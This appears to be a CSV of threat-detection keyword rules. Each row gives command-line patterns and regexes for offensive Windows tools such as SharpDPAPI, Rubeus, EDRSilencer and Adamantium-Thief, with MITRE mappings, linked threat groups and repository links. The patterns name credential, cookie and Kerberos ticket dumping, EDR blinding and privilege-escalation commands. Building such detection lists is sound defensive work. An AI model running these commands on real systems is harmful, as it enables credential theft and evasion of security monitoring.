"*.exe blob /target:C:\Temp\*",".{0,1000}\.exe\sblob\s\/target\:C\:\\Temp\\.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4395"
"*.exe blockedr*",".{0,1000}\.exe\sblockedr.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","0","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","4396"
"*.exe BOOKMARKS*",".{0,1000}\.exe\sBOOKMARKS.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","4397"
"*.exe c:\*.sys 3 clear*",".{0,1000}\.exe\sc\:\\.{0,1000}\.sys\s3\sclear.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","4398"
"*.exe CachedGPPPassword*",".{0,1000}\.exe\sCachedGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4399"
"*.exe certificates /mkfile:*.txt*",".{0,1000}\.exe\scertificates\s\/mkfile\:.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4400"
"*.exe certificates /unprotect*",".{0,1000}\.exe\scertificates\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4401"
"*.exe Certify -action find -enrolleeSuppliesSubject -clientAuth*",".{0,1000}\.exe\sCertify\s\-action\sfind\s\-enrolleeSuppliesSubject\s\-clientAuth.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4402"
"*.exe Certify -action find*",".{0,1000}\.exe\sCertify\s\-action\sfind.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4403"
"*.exe client *:* R:socks*",".{0,1000}\.exe\sclient\s.{0,1000}\:.{0,1000}\sR\:socks.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","Black Basta","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4404"
"*.exe -cmd ""cmd /c whoami""*",".{0,1000}\.exe\s\-cmd\s\""cmd\s\/c\swhoami\"".{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","4405"
"*.exe --CollectionMethods Session --Loop*",".{0,1000}\.exe\s\-\-CollectionMethods\sSession\s\-\-Loop.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","4406"
"*.exe compute --sid * --kdskey *",".{0,1000}\.exe\scompute\s\-\-sid\s.{0,1000}\s\-\-kdskey\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","4407"
"*.exe computername=* command=* username=* password=* connectdrive=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\sconnectdrive\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4408"
"*.exe computername=* command=* username=* password=* elevated=taskmgr*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\selevated\=taskmgr.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4409"
"*.exe computername=* command=* username=* password=* elevated=winr*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\selevated\=winr.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4410"
"*.exe computername=* command=* username=* password=* exec=cmd*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\sexec\=cmd.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4411"
"*.exe computername=* command=* username=* password=* nla=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\s\snla\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4412"
"*.exe computername=* command=* username=* password=* takeover=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\s\stakeover\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4413"
"*.exe COOKIES*",".{0,1000}\.exe\sCOOKIES.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","4414"
"*.exe create /payload* /kb*",".{0,1000}\.exe\screate\s\/payload.{0,1000}\s\/kb.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","4415"
"*.exe createnetonly /program:*",".{0,1000}\.exe\screatenetonly\s\/program\:.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","4416"
"*.exe credentials /pvk:*.pvk*",".{0,1000}\.exe\scredentials\s\/pvk\:.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4417"
"*.exe CREDIT_CARDS*",".{0,1000}\.exe\sCREDIT_CARDS.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","4418"
"*.exe -d * -u * -p * -m LDAPS*",".{0,1000}\.exe\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sLDAPS.{0,1000}","offensive_tool_keyword","SharpLdapRelayScan","SharLdapRealyScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authenticationvand it's a C# port of?LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/klezVirus/SharpLdapRelayScan","1","0","N/A","network exploitation tool","7","1","81","18","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z","4419"
"*.exe -d 1 -c cmd.exe*",".{0,1000}\.exe\s\-d\s1\s\-c\scmd\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","4420"
"*.exe -d 3 -c *powershell -ep bypass*",".{0,1000}\.exe\s\-d\s3\s\-c\s.{0,1000}powershell\s\-ep\sbypass.{0,1000}","offensive_tool_keyword","printspoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","4421"
"*.exe DCSync -action list*",".{0,1000}\.exe\sDCSync\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4422"
"*.exe DCSync -action write -target *",".{0,1000}\.exe\sDCSync\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4423"
"*.exe --dll * --dump * --pid *",".{0,1000}\.exe\s\-\-dll\s.{0,1000}\s\-\-dump\s.{0,1000}\s\-\-pid\s.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","4425"
"*.exe DomainGPPPassword*",".{0,1000}\.exe\sDomainGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4426"
"*.exe DontReqPreAuth -action list*",".{0,1000}\.exe\sDontReqPreAuth\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4427"
"*.exe DontReqPreAuth -action write -target *",".{0,1000}\.exe\sDontReqPreAuth\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4428"
"*.exe dump /luid:* /service:krbtgt*",".{0,1000}\.exe\sdump\s\/luid\:.{0,1000}\s\/service\:krbtgt.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","4429"
"*.exe dump /luid:0x5379f2 /nowrap*",".{0,1000}\.exe\sdump\s\/luid\:0x5379f2\s\/nowrap.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4430"
"*.exe --dump -k * -u http*",".{0,1000}\.exe\s\-\-dump\s\-k\s.{0,1000}\s\-u\shttp.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","4431"
"*.exe dump --key-name *",".{0,1000}\.exe\sdump\s\-\-key\-name\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003  - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","4432"
"*.exe --effective --allow --outfile ""C:\Windows\Tasks\Rules.json""*",".{0,1000}\.exe\s\-\-effective\s\-\-allow\s\-\-outfile\s\""C\:\\Windows\\Tasks\\Rules\.json\"".{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","4433"
"*.exe --effective --allow --rules=""FileHashRule,FilePathRule"" --outfile=*",".{0,1000}\.exe\s\-\-effective\s\-\-allow\s\-\-rules\=\""FileHashRule,FilePathRule\""\s\-\-outfile\=.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","4434"
"*.exe elevatecmd runassystem *",".{0,1000}\.exe\selevatecmd\srunassystem\s.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4435"
"*.exe Enable-LinkedCmdshell*",".{0,1000}\.exe\sEnable\-LinkedCmdshell.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4436"
"*.exe Enable-LinkedCmdshell*",".{0,1000}\.exe\sEnable\-LinkedCmdshell.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4437"
"*.exe --eventviewer *.exe*",".{0,1000}\.exe\s\-\-eventviewer\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4438"
"*.exe exec * cmd interactive*",".{0,1000}\.exe\sexec\s.{0,1000}\scmd\sinteractive.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","4439"
"*.exe exec hide *",".{0,1000}\.exe\sexec\shide\s.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4440"
"*.exe --exec --pid * --prog *cmd.exe*",".{0,1000}\.exe\s\-\-exec\s\-\-pid\s.{0,1000}\s\-\-prog\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","4441"
"*.exe find -username * -dc-ip *",".{0,1000}\.exe\sfind\s\-username\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","4442"
"*.exe Get-DomainController -Domain * -Server * -Credential *",".{0,1000}\.exe\sGet\-DomainController\s\-Domain\s.{0,1000}\s\-Server\s.{0,1000}\s\-Credential\s.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","4444"
"*.exe Get-Hash -Instance * -ip *",".{0,1000}\.exe\sGet\-Hash\s\-Instance\s.{0,1000}\s\-ip\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4445"
"*.exe Get-Hash -Instance * -ip *",".{0,1000}\.exe\sGet\-Hash\s\-Instance\s.{0,1000}\s\-ip\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4446"
"*.exe Get-LinkedServers -Instance *",".{0,1000}\.exe\sGet\-LinkedServers\s\-Instance\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4447"
"*.exe Get-LinkedServers -Instance *",".{0,1000}\.exe\sGet\-LinkedServers\s\-Instance\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4448"
"*.exe Get-SQLInstanceDomain*",".{0,1000}\.exe\sGet\-SQLInstanceDomain.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4449"
"*.exe Get-SQLInstanceDomain*",".{0,1000}\.exe\sGet\-SQLInstanceDomain.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4450"
"*.exe Get-Sysadmins -Instance *",".{0,1000}\.exe\sGet\-Sysadmins\s\-Instance\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4451"
